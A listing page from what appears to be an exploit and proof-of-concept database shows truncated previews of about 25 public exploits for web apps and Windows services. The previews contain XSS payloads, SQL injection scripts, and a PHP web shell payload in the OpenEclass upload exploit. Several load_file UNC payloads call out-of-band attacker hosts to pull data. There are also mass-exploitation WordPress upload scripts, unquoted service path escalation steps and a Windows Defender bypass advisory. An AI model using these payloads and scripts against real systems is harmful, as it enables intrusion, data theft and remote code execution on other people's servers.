
?day POC Vulnerability Database

A POC vulnerability database containing all CVEs, POCs and ?days from across the web in recent years. It can be connected via API to the ishack vulnerability scanner; some vulnerabilities are visible to members only.

  1. # Exploit Title: HTMLy Version v2.9.6 - Stored XSS # Exploit Author: tmrswrr # Vendor Homepage: https://www.htmly.com/ # Version 3.10.8.21 # Date : 04/08/2024 1 ) Login admin https://127.0.0.1/HTMLy/admin/config 2 ) General Setting > Blog title > "><img src=x onerrora=confirm() onerror=confirm(1)> 3 ) After save it you will be see XSS alert

    • 0 replies
    • 15 views
  2. # Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized) # Description: # The Ray Project dashboard contains a CPU profiling page, and the format parameter is # not validated before being inserted into a system command executed in a shell, allowing # for arbitrary command execution. If the system is configured to allow passwordless sudo # (a setup some Ray configurations require) this will result in a root shell being returned # to the user. If not configured, a user level shell will be returned # Version: <= 2.6.3 # Date: 2024-4-10 # Exploit Author: Fire_Wolf # Tested on: Ubuntu 20.04.6 LTS # Vendor Homepage: https://www.ray.io/ # Software Link: https…

    • 0 replies
    • 13 views
  3. # Exploit Title: Terratec dmx_6fire USB - Unquoted Service Path # Google Dork: null # Date: 4/10/2024 # Exploit Author: Joseph Kwabena Fiagbor # Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/ # Software Link: # Version: v.1.23.0.02 # Tested on: windows 7-11 # CVE : CVE-2024-31804 1. Description: The Terratec dmx_6fire usb installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. 2. Proof > C:\Users\Astra>sc qc "ttdmx6firesvc" > {SC] QueryServiceConfig SUCCES…

    • 0 replies
    • 13 views
  4. # Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation # Date: 2024-04-11 # Exploit Author: Jenson Zhao # Vendor Homepage: https://min.io/ # Software Link: https://github.com/minio/minio/ # Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z # Tested on: Windows 10 # CVE : CVE-2024-24747 # Required before execution: pip install minio,requests import argparse import datetime import traceback import urllib from xml.dom.minidom import parseString import requests import json import base64 from minio.credentials import Credentials from minio.signer import sign_v4_s3 class CVE_2024_24747: new_buckets = [] old_buckets = [] def __init__(self, h…

    • 0 replies
    • 14 views
  5. # Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi # Author : Onur Karasalihoğlu # Date : 27/02/2024 # Sample Usage % python3 omos_sqli_exploit.py https://target.com Available Databases: 1. information_schema 2. omosdb Please select a database to use (enter number): 2 You selected: omosdb Extracted Admin Users Data: 1 | Adminstrator | Admin | | 0192023a7bbd73250516f069df18b500 | admin 2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith ''' import requests import re import sys def fetch_database_names(domain): url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JS…

    • 0 replies
    • 14 views
  6. # Exploit Title: GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload # Date: 2024-02-04 # Exploit Author: Georgios Tsimpidas # Vendor Homepage: https://www.openeclass.org/ # Software Link: https://download.openeclass.org/files/3.15/ # Version: 3.15 (2024) # Tested on: Debian Kali (Apache/2.4.57, PHP 8.2.12, MySQL 15.1) # CVE : CVE-2024-31777 # GUnet OpenEclass <= 3.15 E-learning platform - Unrestricted File import requests import argparse import zipfile import os import sys RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' RESET = '\033[0m' ORANGE = '\033[38;5;208m' MALICIOUS_PAYLOAD = """\ <?php if(isset($_REQUEST['cmd']))…

    • 0 replies
    • 13 views
  7. # Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi # Date: February 25th, 2024 # Exploit Author: Stefan Hesselman # Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/ # Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip # Version: 1.0 # Tested on: Kali Linux # CVE: N/A # CWE: CWE-89, CWE-74 ## Description Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database. ## Vul…

    • 0 replies
    • 12 views
  8. ## Title: Human Resource Management System v1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 04/02/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The cityedit parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+' was submitted in the cityedit parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that refe…

    • 0 replies
    • 14 views
  9. # Exploit Title: Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass # Author: LiquidWorm # Vendor: Positron srl # Product web page: https://www.positron.it # https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/ # Affected version: 1.20 # TRA7K5_REV107 # TRA7K5_REV106 # TRA7K5_REV104 # TRA7K5_REV102 # # Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to # guarantee an excellent quality-price ratio in compliance with current regulations and # intended for individual broadcasters or radio networks. All m…

    • 0 replies
    • 13 views
  10. ## Title: Best Student Result Management System v1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 04/08/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The nid parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+' was submitted in the nid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that r…

    • 0 replies
    • 15 views
  11. # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload # Date: 2024-04-01 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys import os.path import requests import re import urllib3 from requests.exceptions import SSLError from multiprocessing.dummy import Pool as ThreadPool from colorama import Fore, init init(autoreset=True) error_color = Fore.RED info_color = Fore.CYAN success_color = Fore.GREEN highlight_color = Fore.MAGENTA requests.urllib3.disable_warnings() headers = { 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozi…

    • 0 replies
    • 15 views
  12. # Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS) # Date: 22 March 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.3.1 # Proof Of Concept: 1. Click Add New Watermark and enter the XSS payload into the Watermark Text. 2. Stored XSS will run on anyone who wants to edit this page. # Vulnerable Property: watermark_title # PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp # Request: POST /wp-admin/post.php HTTP/2 Host: erdemstar.local Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22…

    • 0 replies
    • 15 views
  13. # Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path # Date: 2024-04-01 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Vendor Homepage: http://anydesk.com # Software Link: http://anydesk.com/download # Version: Software Version 7.0.15 # Tested on: Windows 10 Pro x64 1. Description: The Anydesk installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. 2. Proof C:\>sc qc anydesk [SC] QueryServiceConfig SUCCESS SERVIC…

    • 0 replies
    • 17 views
  14. # Title: Computer Laboratory Management System v1.0 - Multiple-SQLi # Author: nu11secur1ty # Date: 03/28/2024 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 # Reference: https://portswigger.net/web-security/sql-injection # Description: The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL o…

    • 0 replies
    • 13 views
  15. # Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Exploit Date: 2024-04-01 # Vendor : https://www.eset.com # Version : 17.0.16.0 # Tested on OS: Microsoft Windows 10 pro x64 C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET Security\ekrn.exe C:\>sc qc ekrn [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ekrn TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_N…

    • 0 replies
    • 15 views
  16. # Exploit Title: Gibbon LMS v26.0.00 - SSTI vulnerability # Date: 21.01.2024 # Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24724 import requests import re import sys def login(target_host, target_port,email,password): url = f'http://{target_host}:{target_port}/login.php?timeout=true' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"} data = f"-----------------------------17447595573126883634155…

    • 0 replies
    • 27 views
  17. # Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting # Date: 2023-09-25 # Exploit Author: Vinnie McRae - RedTeamer IT Security # Vendor Homepage: https://www.axigen.com/ # Software Link: https://www.axigen.com/mail-server/download/ # Version: (10.5.7) and older version of Axigen WebMail # Tested on: firefox, chrome # CVE: CVE-2023-48974 Description The `serverName_input` parameter is vulnerable to stored cross-site scripting (XSS) due to unsanitized or unfiltered processing. This means that an attacker can inject malicious code into this parameter, which will then be executed by other users when they view the page where the parameter is used. This is af…

    • 0 replies
    • 18 views
  18. # Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF # Application: Casdoor # Version: <= 1.331.0 # Date: 03/07/2024 # Exploit Author: Van Lam Nguyen # Vendor Homepage: https://casdoor.org/ # Software Link: https://github.com/casdoor/casdoor # Tested on: Windows # CVE : CVE-2023-34927 Overview ================================================== Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password. This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL. Proof of Concept ================================================== Made an…

    • 0 replies
    • 16 views
  19. [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" erro…

    • 0 replies
    • 14 views
  20. # Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) # Date: 2024-02-25 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re , json from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,app…

    • 0 replies
    • 19 views
  21. # Exploit Title: Smart School 6.4.1 - SQL Injection # Exploit Author: CraCkEr # Date: 28/09/2023 # Vendor: QDocs - qdocs.net # Vendor Homepage: https://smart-school.in/ # Software Link: https://demo.smart-school.in/ # Tested on: Windows 10 Pro # Impact: Database Access # CVE: CVE-2023-5495 # CWE: CWE-89 - CWE-74 - CWE-707 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's re…

    • 0 replies
    • 14 views
  22. ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated) #### Date: 2023-11-25 #### Exploit Author: tmrswrr #### Category: Webapps #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/) #### Version: v1.0.8.20 #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix) ## EXPLOIT : import requests from bs4 import BeautifulSoup import sys import urllib.parse import random from time import sleep class colors: OKBLUE = '\033[94m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' CBLACK = '\33[30m' CRED = '\33[31m' CG…

    • 0 replies
    • 19 views
  23. # Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS) # Date: 2023-11-14 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46020 ------------------------------------------------------------------------------- # Description: The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerabili…

    • 0 replies
    • 15 views
  24. #EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi #References #CVE : CVE-2023-0329 #E1.Coders #Open Burp Suite. #In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080. #Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080. #Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page. #On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": #code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);# #Press "Replace URL" on the Replace URL page. Burp Suite should …

    • 0 replies
    • 18 views
  25. # Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24496 ### Broken Access Control: > Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them. ### Affected Components: > home.php, add-t…

    • 0 replies
    • 21 views